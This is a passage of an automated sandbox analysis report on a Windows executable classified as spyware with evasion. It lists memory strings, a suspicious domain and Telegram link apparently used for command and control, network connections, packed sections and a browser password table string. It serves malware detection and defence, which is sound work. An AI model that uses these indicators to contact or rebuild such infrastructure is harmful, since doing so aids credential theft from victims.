00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318654152.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294406463.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294146278.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294146278.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1237222632.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1237222632.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1150120587.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1150106647.0000000000864000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1150088065.0000000000869000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1150120587.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/farmercommu
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaponrywo.digital/dJSuaj
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1150120587.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=874474847aaa395d08_639503848250
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1150120587.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1237222632.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1237222632.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1237222632.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1237222632.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1237222632.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318600441.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343875916.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49724 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49743 version: TLS 1.2

          System Summary

          barindex
          Source: 12Kp1xbcjv.exeStatic PE information: section name:
          Source: 12Kp1xbcjv.exeStatic PE information: section name:
          Source: 12Kp1xbcjv.exeStatic PE information: section name:
          Source: 12Kp1xbcjv.exeStatic PE information: section name:
          Source: 12Kp1xbcjv.exeStatic PE information: section name:
          Source: 12Kp1xbcjv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 12Kp1xbcjv.exeStatic PE information: Section: ZLIB complexity 0.9988077549846626
          Source: 12Kp1xbcjv.exeStatic PE information: Section: ZLIB complexity 0.999755859375
          Source: 12Kp1xbcjv.exeStatic PE information: Section: ZLIB complexity 0.9932454427083334
          Source: 12Kp1xbcjv.exeStatic PE information: Section: .data ZLIB complexity 0.9971225521970524
          Source: classification engineClassification label: mal100.spyw.evad.winEXE@1/0@13/4
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1181406701.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1180948765.00000000039D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 12Kp1xbcjv.exeVirustotal: Detection: 75%
          Source: 12Kp1xbcjv.exeReversingLabs: Detection: 80%
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile read: C:\Users\user\Desktop\12Kp1xbcjv.exeJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
